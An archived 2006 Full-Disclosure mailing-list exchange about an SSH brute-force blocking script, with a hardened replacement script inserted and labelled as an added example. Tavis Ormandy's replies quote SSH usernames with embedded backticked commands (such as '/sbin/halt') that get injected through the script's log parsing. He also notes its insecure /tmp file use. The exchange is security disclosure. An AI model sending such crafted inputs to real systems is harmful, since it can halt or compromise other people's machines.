Message-ID: <456B54AB.8070506@infiltrated.net>
Date: Mon, 27 Nov 2006 16:12:11 -0500
From: "J. Oquendo" <sil@...iltrated.net>
To: Tavis Ormandy <taviso@...too.org>
Cc: full-disclosure <full-disclosure@...ts.grok.org.uk>
Subject: Re: SSH brute force blocking tool
Tavis Ormandy wrote:
> On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote:
>
>> Tavis Ormandy wrote:
>>
>>> Nice work, really subtle rootkit. I like the email phone-home.
>>>
>>> Here's an exploit.
>>>
>>> #!/bin/sh
>>> ssh 'foo bar `/sbin/halt`'@...tim
>>>
>>>
>>>
>> Since you seem to be clueless I'll answer step by step. Here goes idiot.
>> (Sinful to see someone so clueless coming from Gentoo... Guess it goes
>> with the romper room Linux territory)
>> /////
>> awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru >>
>> /tmp/hosts.deny
>>
>
> insecure temporary file creation, race condition if a user can create
> that file between the unlink and the open.
>
> $ ssh "error retrieving"@localhost & ssh '`0wn3d`'@...alhost
> $ awk '/error retrieving/{getline;print $13}' /var/log/authlog
> `0wn3d`
>
> Oops.
>
> Thanks, Tavis.
>
So again dumbass...
Look at the script. Although YOU'RE opening /var/log/authlog, what is the
script opening? Please tell me you're really not that stupid. And if
someone else decided to modify this script, what does that have to do
with what I posted? How exactly is my script a backdoor as you claim?
Enquiring minds want to know this since you claim it's a backdoor. Please
tell me outside of your modification how this is going to backdoor someone.
--
====================================================
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net
The happiness of society is the end of government.
John Adams
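A hardened form of the awk-to-hosts.deny step the two posters argue over, added here as an example and not code from either of them: it accepts only values that validate as IPv4 addresses rather than trusting field $13, and builds the file through mktemp instead of a fixed /tmp path. The function names and the sshd-style log lines are constructed for the example.

```shell
#!/bin/sh
# Added example, not code from the original thread: a hardened form of the
# "awk ... | sort -ru >> /tmp/hosts.deny" step. (1) A value pulled from the
# log is accepted only if it is a valid IPv4 address, so a username with
# spaces or backticks can neither shift fields nor reach hosts.deny; field
# position ($13) is never trusted. (2) The list is written to a mktemp file
# (mode 0600) in the destination directory and renamed into place, never
# appended under a predictable /tmp path. Lines in sample_log are constructed;
# real sshd/PAM output on a given system may be formatted differently.

is_ipv4() {
    # Succeeds only for a dotted quad with every octet in 0..255.
    case "$1" in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    old_ifs=$IFS; IFS=.; set -- $1; IFS=$old_ifs
    [ "$#" -eq 4 ] || return 1
    for octet in "$@"; do
        [ "$octet" -le 255 ] || return 1
    done
}

extract_ips() {
    # Reads log text on stdin. Keeps the original getline idea (inspect the
    # line after "error retrieving") but checks every field with is_ipv4
    # instead of printing whatever sits at $13. Output is deduplicated.
    awk '/error retrieving/ { if ((getline) > 0) for (i = 1; i <= NF; i++) print $i }' |
    while IFS= read -r field; do
        is_ipv4 "$field" && printf '%s\n' "$field"
    done | sort -u
}

build_deny_list() {
    # $1 = log file, $2 = destination (e.g. /etc/hosts.deny). Atomic replace.
    tmp=$(mktemp "$(dirname "$2")/hosts.deny.XXXXXX") || return 1
    chmod 600 "$tmp"
    extract_ips < "$1" | sed 's/^/sshd: /' > "$tmp" && mv -f "$tmp" "$2"
}

sample_log() {
    # Constructed sshd-style lines using the crafted usernames quoted in the
    # thread. In the first pair, field $13 is `/sbin/halt`, not an address.
    printf '%s\n' \
      'Nov 27 16:00:01 victim sshd[123]: error retrieving information about user foo bar `/sbin/halt`' \
      'Nov 27 16:00:01 victim sshd[123]: Failed password for invalid user foo bar `/sbin/halt` from 198.51.100.9 port 4242 ssh2' \
      'Nov 27 16:00:02 victim sshd[124]: error retrieving information about user `0wn3d`' \
      'Nov 27 16:00:02 victim sshd[124]: Failed password for invalid user `0wn3d` from 203.0.113.7 port 4243 ssh2' \
      'Nov 27 16:00:03 victim sshd[125]: error retrieving information about user 999.1.1.1' \
      'Nov 27 16:00:03 victim sshd[125]: Failed password for invalid user 999.1.1.1 from 203.0.113.7 port 4244 ssh2'
}
```

Run `sample_log > secure.log && build_deny_list secure.log ./hosts.deny` to see only the two real addresses written, with the crafted usernames and the out-of-range 999.1.1.1 dropped.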
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/